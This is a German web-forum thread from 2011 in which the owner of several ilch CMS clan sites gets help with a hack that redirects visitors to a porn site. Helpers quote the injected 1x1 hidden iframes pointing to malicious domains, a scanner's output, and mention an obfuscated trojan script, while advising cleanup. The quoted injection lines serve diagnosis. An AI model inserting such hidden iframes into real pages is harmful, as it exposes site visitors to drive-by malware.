Hi, ich habe seit gestern das Problem das ich jeden Morgen die index wieder neu hochladen mußte aufgrund eines Scriptfehlers in der index.php
Jetzt ist das Problem wenn man auf meine Seite kommt das man automatisch nach ein paar sekunden auf diese seite weitergeleitet wird.
chiangmaifilm.tv/sextube/
Was ich allerdings garnicht so eingestellt habe.Es kommt von ganz allein.kann mir jemand sagen wie ich das wieder weg bekommen werde?
betroffene Homepage: nosterscrew.com
Beitrag zur Merkliste hinzufügen
Hier kann eine Notiz zum Merk-Eintrag hinzugefügt werden (optional)
ilch Forum » Ilch Clan 1.1 » Allgemein » Seite gehackt? Ganz dringend.
| Geschlossen | ||
-
Do. 03.02.2011
10:43 Uhr
#1
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
-
also bei mir blockt dann gleich mal der Virenscanner:
marin50wms.co.cc/apache-stats/awgujrytytcs.php -
Do. 03.02.2011
10:51 Uhr
#3
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Schitt was mach ich nun?Das ist auf anderen Seiten auch von mir.
Zumindest auf einer.Das muss ich so schnell wie möglich beheben aber wie? -
Do. 03.02.2011
10:52 Uhr
#4
- Registriert seit
- 21.03.2007
- Beiträge
- 7.634
- Beitragswertungen
Bei mir auch!
Nimm die Seite offline, lösche alle Schadscripte bzw. Veränderungen oder hau alles runter und installiere NEU oder ein bestehendes BACKUP!
- neue & sichere Passwörter einrichten
- Chmods überprüfen
- Überlegen wen ich welche Rechte anvertrauen kann
- Scripte & Module verwenden die "sicher" sind
Zuletzt modifiziert von Lord|Schirmer am 03.02.2011 - 10:57:34 -
Welche ilch Version besitzt du?
1.1O? -
Do. 03.02.2011
10:55 Uhr
#6
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
ja 1.1 O -
Hast du ip-logger installiert?
Oder darf ich mir mal die Dateien Anschauen. Den irgendwo müsste ja ein Bug sein. Wenn du angegriffen wirst könnten andere es auch sein. -
Do. 03.02.2011
11:08 Uhr
#8
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Na klar wir können uns gerne bei mir im Teamspeak treffen dann kannste mal über teamviewer reinschauen.Das ist komischerweise auf allen meinen Seiten jetzt.Ich habe etwa 4 - 5 wo ich es jetzt gesehen habe.Kann es auch an mein rechner liegen?Also kann ja sein das ich nen Virus habe und der das immer wieder da rein macht oder so.Keine Ahnung.
Meine Teamspeak IP =217.172.183.37:9987
pw= nc
Teamspeak 3
Iplogger ist nicht installiert.
Ich müßte aber nochmal kurz weg.Geht es um 13:30 Uhr ?Oder Schreibe mir eine Zeit dann bin ich da.
Zuletzt modifiziert von Bladezero am 03.02.2011 - 11:11:16 -
Hast du ip-logger?
Wenn ja einfach die tabelle prefix_iplogger2 mir schicken dort steht alles drine.
Ansonsten Installieren! Da ein Hacker ein Bot benutzt denke ich mal das er es danach nochmal versuchen wird.
Leider kann ich kein TeamSpeak benutzen da ich UMTS habe :/ -
Do. 03.02.2011
11:20 Uhr
#10
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Okay dann werde ich es nachher installieren und es hier zukommen lassen.Kannst es ja einrichten das du ne mail bekommst wenn ich sie dir gepostet habe.Ich mache es gleich direkt wenn ich zuhause bin.Im moment ist das Problem wieder weg.Ist aber gleich bestimmmt wieder da.Total kurrios.Danke schonmal
Zuletzt modifiziert von Bladezero am 03.02.2011 - 11:21:28 -
Do. 03.02.2011
11:51 Uhr
#11
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Also ic habe das gefühl das es irgendwie mit mein rechner zu tuhen haben kann.Wenn ich z.b hier drauf gehe habe ich das gleich und das ist eine ganz andere seite die ich mal vor monaten gemacht habe.Wo ich baer die ftp daten noch in mien filezilla habe.
pollinger-underdogs.de/index.php?
Die haben auch die version 1.1 O.
Eventuell wenn ich mein rechner neu mache das dann alles wieder geht?
Ich schalte mal mein rechner bis 13:30 Uhr aus.Wre nett wenn es bis dahin jemand testen könnte oder der fehler immernoch besteht wenn mein Computer aus ist.Danke für eure Hilfe... -
12.15Uhr immer noch vorhanden der Fehler/hacker
-
Do. 03.02.2011
15:20 Uhr
#13
- Registriert seit
- 21.11.2010
- Beiträge
- 740
- Beitragswertungen
15:19 Uhr immer noch! -
Do. 03.02.2011
15:54 Uhr
#14
- Registriert seit
- 03.02.2011
- Beiträge
- 4
- Beitragswertungen
Zitat geschrieben von Bladezero
Problem habe ich auch,
ICH HATTE DEFINITIV EINEN KEYLOGGER DRAUF.
(ab jetzt alle sensiblen Sachen über SUSE)
Bank-fishing Versuch und 2 Domains bei verschiedenen Hostern verseucht.
Strato hat es automatisch gefixt.
scheint irgendwas mit java zu tun zu haben.
Habe folgende Seite im zusammenhang mit chiangmaifilm gefunden:
jsunpack.jeek.org/dec/go?
hier kannst du deine URL testen.
bei der von meiner Kundin betroffenen Domain gibt es dann zB solche Meldungen:
marin57smx.co.cc/apache-stats/awgujrytytcs.php benign
[nothing detected] (iframe) marin57smx.co.cc/apache-stats/awgujrytytcs.php
status: (referer=zxstats.com/)saved 203 bytes a36c1899cdafeb2df256705921d7c07d3c970782
info: [iframe] chiangmaifilm.tv/sextube/
info: [0] no JavaScript
file: a36c1899cdafeb2df256705921d7c07d3c970782: 203 bytes
ich weiss noch nichts damit anzufangen , aber vieleicht eine Spur
vieleicht lösen wir es ja mit vereinten Kräften
......
vG
GS -
Do. 03.02.2011
16:20 Uhr
#15
- Registriert seit
- 03.02.2011
- Beiträge
- 4
- Beitragswertungen
habe den Quelltext der (von mir betreuten) betroffenen Seite untersucht und gefunden :
</head><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe>
google sagt :
Quelle: "http://www.blogdot.de/topic/iframe-srchttp-zxstats-com/"
site hacked: iframe src zxstats or bali-planet com script var zaee=
There is a trojan around infecting sites with a encrypted script starting 'var zaee="4.5*2,4.5*' and iframe src linking to zxstats com and bali-planet com This script is to find right after the body tag of index.html -
Do. 03.02.2011
16:22 Uhr
#16
- Registriert seit
- 03.02.2011
- Beiträge
- 4
- Beitragswertungen
got ya
auf deiner
nosterscrew.com/index.php findest du diesen Iframe auch
und
pollinger-underdogs.de/index.php?
auch
-
Do. 03.02.2011
16:33 Uhr
#17
- Registriert seit
- 22.05.2008
- Beiträge
- 221
- Beitragswertungen
Ich hatte leider auch mal Ärger mit meinen Domains bei Strato.
Es wurden alle Seiten (auch mit anderen CMS!) gehackt.
Meiner Meinung ist das Loch auf der Serverseite zu suchen bzw. man sollte die angebotenen Schutzmechanismen von Strao (Stichwort: Siteguard - Schreibschutz aktivieren/anpassen, FTP und SSH nur bei Bedarf aktivieren und Schreibzugriff-Logging/-Benachrichtigung aktivieren) nutzen.
Dies habe ich auch erst einmal lernen dürfen und habe seit dem diesbezüglich keine Probleme mehr.
Bei mir wurden übrigens die jeweiligen index.php's / index.html's gehackt.
Dort wurde ein "cryptischer" Code eingefügt. Dieser brauch einfach nur gelöscht werden.
Dann natürlich noch die serverseitigen Absicherungen vornehmen... -
Das ist ein Trojaner, der Momentan scheinbar stark angesagt ist.
Von deiner Seite aus führen mehrere iFrames zu einer weiteren Seite, auf der wiederum iFrames zu chiangmaifilm.tv/sextube/ sind.
Beim Aufruf der Seite wird ein Java-Plugin geladen (zusehen an dem Java-Symbol im Infobereich der Taskleiste) und eine Datei runtergeladen.
externer Link
Bei Chrome wird der Aufruf der Seite zum Glück schon automatisch verhindert. Ansonsten einfach einen kostenlosen Virenscanner installieren und einmal die Festplatte scannen. Vielleicht findest du noch andere Dinge
Zuletzt modifiziert von kdl am 03.02.2011 - 16:35:34. -
Do. 03.02.2011
16:49 Uhr
#19
- Registriert seit
- 21.11.2010
- Beiträge
- 740
- Beitragswertungen
in letzter zeit waren hier einpaar clanseiten zusehen die mir immer sagten das ich noch ein plugin laden müsse um die seiten anzusehen. ich hab dies ignoriert, deswegen scheinbar noch sauber...
-
Do. 03.02.2011
20:26 Uhr
#20
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Das komische ist echt das ich direkt auf eine Seite verlinkt werde.Nur bei anderen geht das Antiviren Programm auf.Kann ich eventuell glück haben wenn ich mein rechner neu installiere das es dann weg ist?Weil es ist ja sogar auf seiten wo ich schon lange nicht mehr mit FTP eingeloggt war.
Ich kann ja jetzt nicht 10 Homepages neu installieren!!!!
Wenn ich wüßte in welcher php der Code sich versteckt würde ich ihn ja löschen aber det weiss ich nicht.Ip Logger kann ich nicht installieren weil ich ja direkt weiter geleitet werde.
Danke für eure schnelle Hilfe.Ich hoffe ich komme drum rum nicht jede Page neu zu installieren. -
Do. 03.02.2011
20:43 Uhr
#21
- Registriert seit
- 14.08.2009
- Beiträge
- 492
- Beitragswertungen
Ich würde mir erst mal die index.php bzw. index.htm(l) anschauen... -
Do. 03.02.2011
21:02 Uhr
#22
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Also bei manchen seiten konnte ich den fehler beheben.Nur auf meiner Seite nicht.Ich habe es zwar in der index vom Design gefunden aber weiss nicht wo es sich noch eingeschleicht hat.Gibt es da eine suchfunktion oder sowas in der art?
Das ist das Script was sich einbaut.
<iframe src="http://stxstats.com/" width="1" height="1" frameborder="0"></iframe>
wenn ich mir mein seitenquelltext anzeigen lasse finde ich ihn aber nicht in der index.php oder index.htm vom Design.Nix zu finden.Jemand eine Idee?
Danke euch
Zuletzt modifiziert von Bladezero am 03.02.2011 - 22:02:55 -
Do. 03.02.2011
22:38 Uhr
#23
- Registriert seit
- 03.02.2011
- Beiträge
- 4
- Beitragswertungen
Zitat"Nur auf meiner Seite nicht.Ich habe es zwar in der index vom Design gefunden aber weiss nicht wo es....."
Hat es sich auf deiner seite mehrmals eingetragen?
(willst du deine homepage hier nennen?,hast du sie programmiert?,oder war es ein Template oä?, welches ist die eingangsseite? Ist es ein Frameset?)
LG
GS -
Fr. 04.02.2011
15:21 Uhr
#24
- Registriert seit
- 07.05.2008
- Beiträge
- 128
- Beitragswertungen
Nein das ganze ist kein Frameset.Die seite habe ich selber gemacht.Wie viele andere auch.Problem ist von Heute auf morgen gekommen.Ich denke das kann damit zu tun haben das ich mir was eingefangen habe auf mein rechner.Ich habe eine lange zeit an manchen homepages garnicht mehr gearbeitet trotzallem ist es bei dem auch passiert.Das erste mal allerdings in 4 Jahren.
Ich habe alle index datein durch und viele viele mehr.Kann aber leider nix mehr finden.
Hier nochmal eine Seite von mir mit dem gleichen Problem.
fahrschule-ulas.de
Und hier nochmal eine wo ich den fehler beheben konnte.
alt-schörken.de
Dort war es in zwei Datein drin.Nur bei der anderen Seite nicht.Ist aber im Quelltext zu finden der Code wenn man danach sucht.Nur in welcher datei kann es noch sein wenn man es im Quelltext lesen kann? -
In allen Template Dateien im include/templates Ordner und den Unterordnern könnte eventuell was sein..
-
Do. 10.02.2011
00:16 Uhr
#26
- Registriert seit
- 15.05.2007
- Beiträge
- 578
- Beitragswertungen
Am einfachsten wäre es, wenn du von deinem PC erstmal die java runtime entfernst. Du meintest vorhin: sensible Sachen nur noch über SuSe. In diesem Fall wirst du eventuell das gleiche Problem haben, da Java doch Plattformübergreifend ist.
Am besten wäre es, wenn du FTP deaktivieren könntest, aber zuvor deine ilch installation checken würdest. -> Downloade alles und Suche nach Dateiinhalten (z.B. mit notepad++)
liegt eine .htaccess bei dir drin? erstmal entfernen, später neu machen.
Ich will hier niemandem zu nahe treten, aber diesen trojaner gibts gratis dazu bei nem Besuch von Websites mit nulled scripts drauf.
| Geschlossen | ||
 |
Zurück zu Allgemein | |
Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten